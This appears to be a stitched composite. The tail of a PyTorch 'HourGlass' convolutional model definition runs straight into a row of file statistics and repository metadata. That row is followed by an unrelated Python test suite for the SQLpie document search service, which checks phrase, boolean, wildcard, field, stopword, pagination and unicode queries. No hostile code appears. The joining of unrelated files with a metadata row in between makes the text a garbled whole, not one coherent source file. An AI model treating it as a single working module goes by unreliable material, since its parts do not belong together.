nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
nn.UpsamplingNearest2d(scale_factor=2),
),
),
LambdaReduce(LC), # CAddTable
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential,
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
)
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 64, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 64, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 64, (11, 11), (1, 1), (5, 5)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
nn.UpsamplingNearest2d(scale_factor=2),
),
),
LambdaReduce(LC) # CAddTable
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
nn.UpsamplingNearest2d(scale_factor=2)
),
Sequential( # Sequential
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 32, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 32, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 32, (11, 11), (1, 1), (5, 5)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
),
),
LambdaReduce(LC), # CAddTable
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 32, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 32, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 32, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(128, 16, (1, 1)),
nn.BatchNorm2d(16, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential,
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 16, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(16, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 16, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(16, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 16, (11, 11), (1, 1), (5, 5)),
nn.BatchNorm2d(16, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
nn.UpsamplingNearest2d(scale_factor=2)
),
Sequential( # Sequential
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(128, 16, (1, 1)),
nn.BatchNorm2d(16, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 16, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(16, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 16, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(16, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 16, (11, 11), (1, 1), (5, 5)),
nn.BatchNorm2d(16, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
),
),
LambdaReduce(LC) # CAddTable
),
nn.Conv2d(64, 1, (3, 3), (1, 1), (1, 1))
)
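# Illustrative sketch (not part of the original file): HourGlass maps a
# 3-channel image to a single-channel depth-style map at the input
# resolution. Because pooling at each nesting level is undone by a matching
# nearest-neighbor upsample, height and width should be divisible by 16 so
# the CAddTable branches line up.
#
#   with torch.no_grad():
#       out = HourGlass(torch.randn(1, 3, 64, 64))  # -> shape (1, 1, 64, 64)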
| 61.939055 | 102 | 0.254724 | 3,528 | 49,799 | 3.589569 | 0.020975 | 0.031901 | 0.159112 | 0.20807 | 0.96494 | 0.96494 | 0.956175 | 0.953253 | 0.944488 | 0.944488 | 0 | 0.15646 | 0.650134 | 49,799 | 803 | 103 | 62.016189 | 0.570395 | 0.027209 | 0 | 0.950382 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010178 | false | 0 | 0.005089 | 0.007634 | 0.029262 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
a462aaac2daa439b529868f54a8d20ffe7f8cfde | 56,300 | py | Python | tests/service_searcher_tests.py | lessaworld/sqlpie | 22cac1fc7f9cb939e823058f84a68988e03ab239 | [
"MIT"
] | 3 | 2016-01-27T19:49:23.000Z | 2020-08-18T13:59:02.000Z | tests/service_searcher_tests.py | lessaworld/sqlpie | 22cac1fc7f9cb939e823058f84a68988e03ab239 | [
"MIT"
] | null | null | null | tests/service_searcher_tests.py | lessaworld/sqlpie | 22cac1fc7f9cb939e823058f84a68988e03ab239 | [
"MIT"
] | 1 | 2016-02-01T01:57:54.000Z | 2016-02-01T01:57:54.000Z | # -*- coding: utf-8 -*-
"""
SQLpie License (MIT License)
Copyright (c) 2011-2016 André Lessa, http://sqlpie.com
See LICENSE file.
"""
import json
import sqlpie
class ServiceSearcherTests(object):
#
# Service Searcher Tests
#
def run_before_service_searcher_tests(self):
response = self.app.post('/document/reset', data=json.dumps({}), content_type = 'application/json')
books = {"documents":[{"_id":"Back to the Future", "_bucket":"movies","name":"Back to the Future"},{"_id":"Iron Eagle", "_bucket":"movies","name":"Iron Eagle"},{"_id":"1492", "_bucket":"movies","name":"1492"},{"_id":"The Avengers", "_bucket":"movies","name":"The Avengers"},{"_id":"The Matrix", "_bucket":"movies","name":"The Matrix"}, {"_id":"Terminator", "_bucket":"movies","name":"Terminator"},{"_id":"Star Wars", "_bucket":"movies","name":"Star Wars"},{"_id":"The Goonies", "_bucket":"movies","name":"The Goonies"},{"_id":"Iron Man", "_bucket":"movies","name":"Iron Man"},{"_id":"Iron Curtain", "_bucket":"movies","name":"Iron Curtain"},{"_id":"Eagle of Iron", "_bucket":"movies","name":"Eagle of Iron"},{"_id":"hp01", "_bucket":"movies","name":"Harry Potter"},{"_id":"hp02", "_bucket":"movies","name":"Harry Potter"},{"_id":"hp03", "_bucket":"movies","name":"Harry Potter"}]}
response = self.app.post('/document/put', data=json.dumps(books), content_type = 'application/json')
response = self.app.post('/service/index', data=json.dumps({"options":{"rebuild":True}}), content_type = 'application/json')
def run_before_service_searcher_tests_unicode(self):
response = self.app.post('/document/reset', data=json.dumps({}), content_type = 'application/json')
docs = {"documents":[{"_id":"001", "_bucket":"tests","name":"Antonia's"},{"_id":"002", "_bucket":"tests","name":"Misérables"},{"_id":"003", "_bucket":"tests","name":"naïve"},{"_id":"004", "_bucket":"tests","name":"café"}]}
response = self.app.post('/document/put', data=json.dumps(docs), content_type = 'application/json')
response = self.app.post('/service/index', data=json.dumps({"options":{"rebuild":True}}), content_type = 'application/json')
def run_before_service_searcher_tests_multiple_originals(self):
response = self.app.post('/document/reset', data=json.dumps({}), content_type = 'application/json')
docs = {"documents":[{"_id":"005", "_bucket":"tests","name":"Drive"},{"_id":"006", "_bucket":"tests","name":"Driving"},{"_id":"007", "_bucket":"tests","name":"driving"}]}
response = self.app.post('/document/put', data=json.dumps(docs), content_type = 'application/json')
response = self.app.post('/service/index', data=json.dumps({"options":{"rebuild":True}}), content_type = 'application/json')
def run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators(self):
response = self.app.post('/document/reset', data=json.dumps({}), content_type = 'application/json')
docs = {"documents":[{"_id":"001", "_bucket":"orders","order_date":"Mar/01/2015", "billing":{"state":"pa", "city":"pittsburgh"}, "shipping":{"state":"ca", "city":"los angeles"}, "total": 250}, {"_id":"002", "_bucket":"orders","order_date":"Jul/12/2015", "billing":{"state":"pa", "city":"pittsburgh"}, "shipping":{"state":"ca", "city":"los angeles"}, "total": 200}, {"_id":"003", "_bucket":"orders","order_date":"Dec/01/2015", "billing":{"state":"fl", "city":"florida"}, "shipping":{"state":"ca", "city":"los angeles"}, "total": 300}, {"_id":"004", "_bucket":"orders","order_date":"Mar/15/2015", "billing":{"state":"pa", "city":"pittsburgh"}, "shipping":{"state":"ca", "city":"san francisco"}, "total": 450}, {"_id":"005", "_bucket":"orders","order_date":"Mar/01/2015", "billing":{"state":"pa", "city":"erie"}, "shipping":{"state":"fl", "city":"florida"}, "total": 50}, {"_id":"006", "_bucket":"orders","order_date":"Oct/01/2015", "billing":{"state":"pa", "city":"erie"}, "shipping":{"state":"fl", "city":"florida", "cost":84.32}, "total": 50}, {"_id":"007", "_bucket":"orders","order_date":"Oct/01/2015", "billing":{"state":"pa", "city":"erie"}, "shipping":{"state":"fl", "city":"florida", "cost":84.32, "shipping_date":"Oct/02/2015"}, "total": 50}
], "parsers":["dates"]}
response = self.app.post('/document/put', data=json.dumps(docs), content_type = 'application/json')
response = self.app.post('/service/index', data=json.dumps({"options":{"rebuild":True}}), content_type = 'application/json')
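# Note (added aside): the "parsers": ["dates"] option above presumably tells
# the indexer to treat date-like strings such as "Mar/01/2015" as typed date
# values rather than plain tokens, which the date/numeric field operators
# this fixture is named for would rely on.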
def run_before_service_searcher_tests_boolean_field_search(self):
response = self.app.post('/document/reset', data=json.dumps({}), content_type = 'application/json')
docs = {"documents":[{"_id":"001", "_bucket":"orders","order_date":"Mar/01/2015", "billing":{"state":"pa", "city":"pittsburgh"}, "shipping":{"state":"ca", "city":"los angeles"}, "total": 250}, {"_id":"002", "_bucket":"orders","order_date":"Jul/12/2015", "billing":{"state":"pa", "city":"pittsburgh"}, "shipping":{"state":"ca", "city":"los angeles","shipped":True}, "total": 200}, {"_id":"003", "_bucket":"orders","order_date":"Dec/01/2015", "billing":{"state":"fl", "city":"florida"}, "shipping":{"state":"ca", "city":"los angeles"}, "total": 300}, {"_id":"004", "_bucket":"orders","order_date":"Mar/15/2015", "billing":{"state":"pa", "city":"pittsburgh"}, "shipping":{"state":"ca", "city":"san francisco"}, "total": 450}, {"_id":"005", "_bucket":"orders","order_date":"Mar/01/2015", "billing":{"state":"pa", "city":"erie"}, "shipping":{"state":"fl", "city":"florida"}, "total": 50}, {"_id":"006", "_bucket":"orders","order_date":"Oct/01/2015", "billing":{"state":"pa", "city":"erie"}, "shipping":{"state":"fl", "city":"florida", "cost":84.32, "shipped":False}, "total": 50}, {"_id":"007", "_bucket":"orders","order_date":"Oct/01/2015", "billing":{"state":"pa", "city":"erie"}, "shipping":{"state":"fl", "city":"florida", "cost":84.32, "shipping_date":"Oct/02/2015"}, "total": 50}
], "parsers":["dates"]}
response = self.app.post('/document/put', data=json.dumps(docs), content_type = 'application/json')
response = self.app.post('/service/index', data=json.dumps({"options":{"rebuild":True}}), content_type = 'application/json')
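# Illustrative helper sketch (not part of the original suite): the tests
# below all repeat the same request/assert cycle, which a hypothetical
# helper could capture as:
#
#   def _search(self, query, **params):
#       payload = dict(q=query, **params)
#       response = self.app.post('/service/search', data=json.dumps(payload),
#                                content_type='application/json')
#       return json.loads(response.data)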
def test_service_search_01_query_not_found(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"vnzzoasd3if"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 0, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 0, "Actual Response : %r" % json_response
def test_service_search_02_query_wrong_bucket(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":'"Iron Eagle"'}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 0, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 0, "Actual Response : %r" % json_response
def test_service_search_03_query_quote(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":'"Iron Eagle" _bucket:movies'}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 1, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 1, "Actual Response : %r" % json_response
def test_service_search_04_query_multiple(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"Iron _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 4, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 4, "Actual Response : %r" % json_response
def test_service_search_05_query_not_operator(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"Iron -man _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 3, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 3, "Actual Response : %r" % json_response
def test_service_search_06_query_misplaced_not_operator(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"- man _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == False, "Actual Response : %r" % json_response
assert "Expected W:(abcd...)" in json_response["err"], "Actual Response : %r" % json_response
def test_service_search_07_query_or_operator_within_parenthesis(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"(eagle OR man) _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 3, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 3, "Actual Response : %r" % json_response
def test_service_search_08_query_and_operator(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"Iron AND man _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 1, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 1, "Actual Response : %r" % json_response
def test_service_search_09_query_parenthesis_only(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"(man) _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 1, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 1, "Actual Response : %r" % json_response
def test_service_search_10_query_parenthesis_only_multiple(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"(iron) _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 4, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 4, "Actual Response : %r" % json_response
def test_service_search_11_query_or_not_operators_parenthesis(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"(iron OR eagle) -man _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 3, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 3, "Actual Response : %r" % json_response
def test_service_search_12_query_misplaced_quote(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":'"iron eagle -man _bucket:movies'}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == False, "Actual Response : %r" % json_response
assert "Expected \"\"\"" in json_response["err"], "Actual Response : %r" % json_response
def test_service_search_13_query_field_operator(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"name:terminator _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 1, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 1, "Actual Response : %r" % json_response
def test_service_search_14_query_field_or_phrase_parenthesis_operators(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":'(name:terminator) OR "star wars" _bucket:movies'}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 2, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 2, "Actual Response : %r" % json_response
def test_service_search_15_query_double_wildcard_operators(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"termin* or goon* _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 2, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 2, "Actual Response : %r" % json_response
def test_service_search_16_wildcard_phrase_operators(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":'ter* or "goonies" _bucket:movies'}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 2, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 2, "Actual Response : %r" % json_response
def test_service_search_17_multiple_field_operators(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"name:Harry or name:terminator _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 4, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 4, "Actual Response : %r" % json_response
def test_service_search_18_ignore_stopwords_and_return_all(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"the _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 10, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 10, "Actual Response : %r" % json_response
def test_service_search_19_ignore_stopwords(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"the matrix _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 1, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 1, "Actual Response : %r" % json_response
def test_service_search_20_add_new_stopwords(self):
request = {"bucket":"_STOPWORDS", "key":"matrix"}
response = self.app.post('/caching/add', data=json.dumps(request), content_type = 'application/json')
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"the matrix _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 10, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 10, "Actual Response : %r" % json_response
def test_service_search_21_remove_stopwords(self):
request = {"bucket":"_STOPWORDS", "key":"matrix"}
response = self.app.post('/caching/remove', data=json.dumps(request), content_type = 'application/json')
# Rebuild the index now that the stopword has been removed
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"the matrix _bucket:movies"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 1, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 1, "Actual Response : %r" % json_response
def test_service_search_23_max_results_and_pagination(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"harry _bucket:movies","num":1,"start":1}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 1, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 1, "Actual Response : %r" % json_response
def test_service_search_24_max_results_and_pagination(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"harry _bucket:movies","num":2,"start":2}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 1, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 1, "Actual Response : %r" % json_response
def test_service_search_25_max_results_and_pagination(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":"harry _bucket:movies","num":2,"start":1}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 2, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 2, "Actual Response : %r" % json_response
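# Unicode: accented terms match whether the query keeps the accents
# (test 26) or folds them to plain ASCII (test 27).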
def test_service_search_26_unicode_characters_index_and_search(self):
self.run_before_service_searcher_tests_unicode()
response = self.app.post('/service/search', data=json.dumps({"q":"Antonia's or Misérables or naïve or café _bucket:tests"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 4, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 4, "Actual Response : %r" % json_response
